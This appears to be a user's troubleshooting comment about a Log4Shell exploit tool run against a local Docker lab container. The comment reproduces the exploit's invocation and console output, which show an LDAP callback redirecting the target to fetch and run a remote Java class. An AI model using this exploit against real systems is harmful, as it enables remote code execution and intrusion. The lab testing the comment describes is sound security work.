Having used #2 I still can't see file creation:
The exploit seems to have been applied:
python3 main.py -i 172.17.0.1 -u http://172.17.0.3:8080 -c "touch foobar" -p9999
██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗███████╗██╗ ██╗
██║ ██╔═══██╗██╔════╝ ██║ ██║██╔════╝██║ ██║██╔════╝██║ ██║
██║ ██║ ██║██║ ███╗███████║███████╗███████║█████╗ ██║ ██║
██║ ██║ ██║██║ ██║╚════██║╚════██║██╔══██║██╔══╝ ██║ ██║
███████╗╚██████╔╝╚██████╔╝ ██║███████║██║ ██║███████╗███████╗███████╗
╚══════╝ ╚═════╝ ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝
Log4Shell Exploit (Cyber Struggle Delta Group) via @safe_buffer
[*] Started http server on 9999
[*] Started LDAP server on 1389
[*] Spraying 81 known HTTP Header
okeeje
[+] LDAP Callback sending [('javaClassName', ['Main']), ('objectClass', ['javaNamingReference']), ('javaCodeBase', ['http://172.17.0.1:9999/']), ('javaFactory', ['Main'])]
[+] Redirecting to http://172.17.0.1:9999/Main touch foobar
New HTTP Request 200
[+] Sent the final payload your command has been executed right now
okeeje
[+] LDAP Callback sending [('javaClassName', ['Main']), ('objectClass', ['javaNamingReference']), ('javaCodeBase', ['http://172.17.0.1:9999/']), ('javaFactory', ['Main'])]
[+] Redirecting to http://172.17.0.1:9999/Main touch foobar
And in the 'vulnerable-app' container;
2021-12-15 22:07:41.325 INFO 1 --- [nio-8080-exec-5] HelloWorld : Received a request for API version Log4Shell-CS Reference Class Name: Main
But I can't see any file foobar
in the container:
docker exec -ti vulnerable-app sh
/ # ls /tmp
hsperfdata_root tomcat-docbase.8080.4676561178698547045 tomcat.8080.7851898943690850285
/ #